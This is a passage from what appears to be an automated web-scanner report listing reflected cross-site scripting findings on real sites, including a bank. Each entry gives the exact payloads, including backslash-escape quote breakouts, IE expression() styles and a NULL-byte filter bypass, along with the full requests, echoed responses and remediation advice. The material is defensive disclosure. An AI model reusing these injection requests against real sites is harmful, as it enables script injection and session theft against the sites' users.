Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:46 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=21818F4&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C12
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="30079fda';alert(1)//cbed4520d8d" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.435. http://thestreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thestreet.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1bad9<script>alert(1)</script>6e86ca26221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /intellitxt/front.asp?ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1 HTTP/1.1
Host: thestreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA6yAEAAAEthmhrrQA-; VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+c+YAA-; Domain=.intellitxt.com; Expires=Mon, 04-Apr-2011 14:22:36 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 14:22:36 GMT
Connection: close
Content-Length: 8275

/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */
if('undefined'==typeof $iTXT){var $iTXT={};}if('undefined'==typ
...[SNIP]...
ad();}}};function itxtBegin(){
var itxturl='http://thestreet.us.intellitxt.com/v3/door.jsp?ts='+(new Date()).getTime()+'&pagecl='+itxtbtl()+'&enc='+itxtGCE()+'&fv='+gDFVS()+'&muid='+MUID+'&ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1';
itxturl+='&seid='+gSEID+'&sest='+gSEST;
if ($iTXT && $iTXT.js && $iTXT.js.ready) {$iTXT.js.load(itxturl);
} else if ($iTXT && $iTXT.js) {$iTXT.js.onload = function() {
$iTXT.js.load(itxturl);
...[SNIP]...

1.436. http://thestreet.us.intellitxt.com/v3/door.jsp [sest parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thestreet.us.intellitxt.com
Path:   /v3/door.jsp

Issue detail

The value of the sest request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbce3\'%3balert(1)//470e2868204 was submitted in the sest parameter. This input was echoed as cbce3\\';alert(1)//470e2868204 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /v3/door.jsp?ts=1296742745648&pagecl=2359&enc=&fv=101&muid=&ipid=10685&seid=0&sest=cbce3\'%3balert(1)//470e2868204 HTTP/1.1
Host: thestreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+LRYAA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 14:22:49 GMT
Connection: close
Content-Length: 10430


/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */
try{if('undefined'==typeof $iTXT){var $iTXT={};}$iTXT.door={}
...[SNIP]...
omponent(tTXT.replace(/\n/,' ')); while (p.ttxt.indexOf('\'')>-1) p.ttxt=p.ttxt.replace('\'', '%27');p.auat=0;p.lpgv=0;p.ddate=dDate;p.pvu=gPVU;p.pvm=gPVM;p.forcedb=0;p.seid=gSEID;p.unrm=false;p.sest='cbce3\\';alert(1)//470e2868204';p.ru=encodeURIComponent(sRU);cAs(server,p);} else if (gCL){if(((gITXTN!=null&&gITXTN.length)||(gITXTNi!=null&&gITXTNi.length))&&gCL>
...[SNIP]...

1.437. http://weather.weatherbug.com/ [zcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 was submitted in the zcode parameter. This input was echoed as 478ba"style="x:expression(alert(1))"78c9aed888 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?zip=75201&zcode=478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 103556
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:34:49 GMT
Connection: close


                                                                                   
...[SNIP]...
<iframe name="cds1" src="http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wthrwbug.com/HM@cds1?&LNG=enUS&PC=478ba"style="x:expression(alert(1))"78c9aed888&Z3=75201&L2=Dallas&L3=TX&L5=USA&L1=623&L4=53&WO1=20.3&FC1=1&FC2=126&FC3=7&FC7=33&FC9=49&WO3=101&HO1=2.70&HO4=Cedar/Juniper and Elm.&HO3=-999" width="728" height="90" allowtransparency="true" framebord
...[SNIP]...

1.438. http://weather.weatherbug.com/ [zcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 531ee"%3balert(1)//40807062aa8 was submitted in the zcode parameter. This input was echoed as 531ee";alert(1)//40807062aa8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?zip=75201&zcode=6292531ee"%3balert(1)//40807062aa8 HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 100657
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:34:53 GMT
Connection: close


                                                                                   
...[SNIP]...
<script type="text/javascript">
   var feedbackURL = "http://weather.weatherbug.com/feedback-form.html?zcode=6292531ee";alert(1)//40807062aa8&region=8&region_name=North America&country=US&country_name=USA&state_code=TX&state_name=Texas&zip=75201&city_name=Dallas&stat=DALS1";
</script>
...[SNIP]...

1.439. http://weather.weatherbug.com/ [zcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc was submitted in the zcode parameter. This input was echoed as 3b886"style="x:expression(alert(1))"e0fb95ae5dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?zip=75201&zcode=62923b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 104331
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:34:36 GMT
Connection: close


                                                                                   
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="All WeatherBug feeds" href="http://feeds.weatherbug.com/rss.aspx?zipCode=75201&zCode=62923b886"style="x:expression(alert(1))"e0fb95ae5dc&units=0&feed=curr,fcst,cpht,news" />
...[SNIP]...

1.440. http://weather.weatherbug.com/ [zcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c92\'%3balert(1)//fb3d6162354 was submitted in the zcode parameter. This input was echoed as b8c92\\';alert(1)//fb3d6162354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /?zip=75201&zcode=6292b8c92\'%3balert(1)//fb3d6162354 HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 101771
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:35:04 GMT
Connection: close


                                                                                   
...[SNIP]...
dmn = document.domain;
        wxOAS_sitepage = 'www.wthrwbug.com/HM';
    wxOAS_url = 'http://pub.weatherbug.com/RealMedia/ads/';
    wxOAS_targetparams = '&DMN=' + dmn + '&LNG=enUS&PC=6292b8c92\\';alert(1)//fb3d6162354&Z3=75201&L2=Dallas&L3=TX&L5=USA&L1=623&L4=53&WO1=20.3&FC1=1&FC2=126&FC3=7&FC7=33&FC9=49&WO3=101&HO1=2.70&HO4=Cedar/Juniper and Elm.&HO3=-999';
    wxOAS_listpos = 'cds1,cds2,cds3,cds4,cds9';
   
...[SNIP]...

1.441. http://www.bbt.com/bbt/Business/Products/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/Business/Products/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f5e39"><script>alert(1)</script>409e4716c9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5e39"><script>alert(1)</script>409e4716c9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/Business/Products/?%00f5e39"><script>alert(1)</script>409e4716c9d=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:13 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 53268
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
           
...[SNIP]...
<a href="/bbt/Business/Products/default.html?page=print&%00f5e39"><script>alert(1)</script>409e4716c9d=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.442. http://www.bbt.com/bbt/Personal/Products/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/Personal/Products/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0069b54"><script>alert(1)</script>e1573406ba9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b54"><script>alert(1)</script>e1573406ba9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/Personal/Products/?%0069b54"><script>alert(1)</script>e1573406ba9=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:49 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 40557
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
           
...[SNIP]...
<a href="/bbt/Personal/Products/default.html?page=print&%0069b54"><script>alert(1)</script>e1573406ba9=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.443. http://www.bbt.com/bbt/about/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/about/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002a618"><script>alert(1)</script>b69e85cef55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a618"><script>alert(1)</script>b69e85cef55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/about/?%002a618"><script>alert(1)</script>b69e85cef55=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:46 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 27477
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<
...[SNIP]...
<a href="/bbt/about/default.html?page=print&%002a618"><script>alert(1)</script>b69e85cef55=1" onClick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.444. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/about/privacyandsecurity/completeclientprotection/default.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007a93d"><script>alert(1)</script>a2f88c48136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a93d"><script>alert(1)</script>a2f88c48136 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/about/privacyandsecurity/completeclientprotection/default.html?%007a93d"><script>alert(1)</script>a2f88c48136=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:35 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 30854
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   

       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
           
...[SNIP]...
<a href="/bbt/about/privacyandsecurity/completeclientprotection/default.html?page=print&%007a93d"><script>alert(1)</script>a2f88c48136=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.445. http://www.bbt.com/bbt/careers/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/careers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0012a7a"><script>alert(1)</script>5fb5315ccee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12a7a"><script>alert(1)</script>5fb5315ccee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/careers/?%0012a7a"><script>alert(1)</script>5fb5315ccee=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:51 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 33957
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

       
   <title>Car
...[SNIP]...
<a href="/bbt/careers/default.html?page=print&%0012a7a"><script>alert(1)</script>5fb5315ccee=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.446. http://www.bbt.com/bbt/mobile/mobile-product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/mobile/mobile-product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9529"><script>alert(1)</script>45d303da152 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9529"><script>alert(1)</script>45d303da152 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/mobile/mobile-product.html?%00f9529"><script>alert(1)</script>45d303da152=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:30 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 30271
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
                   
...[SNIP]...
<a href="/bbt/mobile/mobile-product.html?page=print&%00f9529"><script>alert(1)</script>45d303da152=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

